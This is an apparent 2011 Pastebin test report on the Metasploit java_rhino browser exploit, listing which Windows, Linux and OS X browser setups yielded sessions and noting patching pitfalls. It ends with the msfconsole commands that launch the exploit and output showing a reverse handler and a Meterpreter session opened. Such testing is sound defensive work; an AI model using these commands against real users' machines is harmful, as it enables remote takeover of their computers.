SHARE
TWEET

Untitled

a guest Nov 30th, 2011 436 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. =============
  2. TEST RESULTS:
  3. =============
  4.  
  5. Below is a breakout of the results of our java_rhino exploit testing on a variety of platforms. This vulnerability is particularly pernicious, as it is cross-platform, unpatched on some systems, and generally an easy-to-exploit client-side that does little to make the user aware they're being exploited.
  6.  
  7. Windows:
  8. ========
  9.  
  10. A Windows XP device was tested for vulnerability, a session was able to be generated in every browser when the system was running java versions prior to the latest. Note that chrome did prompt the user to let them know the java plugin was out of date, though users can still click 'Run this time' and allow the exploit to complete. No other browsers prompted the user.
  11.  
  12. WinXP sp3 / IE 7 - SESSION CREATED with versions prior to 1.6.0_29-b11
  13. WinXP sp3 / firefox - SESSION CREATED with versions prior to 1.6.0_29-b11
  14. WinXP sp3 / chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
  15. WinXP sp3 / safari 5.1.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
  16.  
  17. Linux:
  18. ======
  19.  
  20. Several linux desktops were tested, one with the Sun Java plugin, and another with the Iced Tea plugin. The Iced Tea java plugin was determined to not be vulnerable, though it wasn't tested extensively, it may still be vulnerable.
  21.  
  22. An attempt was made to update the Ubuntu 10.04 device, and the java package was downloaded and linked to system java, however, the plugin was not installed as part of this process, and thus, even though the device was running the latest (build 1.6.0_29-b11), the 10.04 device remained vulnerable. YOU MUST FOLLOW THESE INSTRUCTIONS TO INSTALL THE JAVA PLUGIN: http://www.oracle.com/technetwork/java/javase/manual-plugin-install-linux-136395.html
  23.  
  24. Chrome again prompted the user to alert them that Java was out-of-date. Firefox did not.
  25.  
  26. Ubuntu 10.04 LTS / firefox (sun java 1.6.0_26) SESSION CREATED - no package available in the repositories
  27. Ubuntu 10.04 LTS / chrome (sun java 1.6.0_26) - SESSION CREATED - no package available in the repositories
  28. Ubuntu 11.10 / chrome (iced tea 1.6.0_23) - NO SESSION CREATED, null pointer exception in the iced tea plugin
  29.  
  30. OS X:
  31. =====
  32.  
  33. Interesting issue here, i was forced to update, restart, then update again to get the updated sun java plugin. Apparently one of the updates forced a restart in the middle of the update process, and thus, a second update was required to get the latest java package. To be fair, this system wasn't updated in recent memory, but it's important to note that multiple updates may be required. This process required approximately one hour to complete.
  34.  
  35. OS X 10.6.6 / chrome 15.0.874 - SESSION CREATED with versions prior to 1.6.0_29-b11
  36. OS X 10.6.6 / firefox 6.0.1 - SESSION CREATED with versions prior to 1.6.0_29-b11
  37. OS X 10.6.6 / safari 5.0.3 - SESSION CREATED with versions prior to 1.6.0_29-b11
  38.  
  39.  
  40.  
  41. =============
  42. MODULE USAGE:
  43. =============
  44.  
  45. msf  exploit(handler) > use exploit/multi/browser/java_rhino
  46. msf  exploit(java_rhino) > info
  47. msf  exploit(java_rhino) > set URIPATH xxxx
  48. msf  exploit(java_rhino) > exploit
  49.  
  50. [*] Exploit running as background job.
  51. [*] Started reverse handler on 10.0.0.11:4444
  52. [*] Using URL: http://0.0.0.0:8080/xxxx
  53. [*]  Local IP: http://10.0.0.11:8080/xxxx
  54. [*] Server started.
  55. msf  exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 10.0.0.10:1284...
  56. [*] Sending Applet.jar to 10.0.0.10:1288...
  57. [*] Sending Applet.jar to 10.0.0.10:1288...
  58. [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 10.0.0.10:1289...
  59. [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 10.0.0.10:1290...
  60. [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 10.0.0.10:1291...
  61. [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 10.0.0.10:1292...
  62. [*] Sending stage (28469 bytes) to 10.0.0.10
  63. [*] Meterpreter session 1 opened (10.0.0.11:4444 -> 10.0.0.10:1293) at 2011-11-29 22:25:33 -0600
  64.  
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top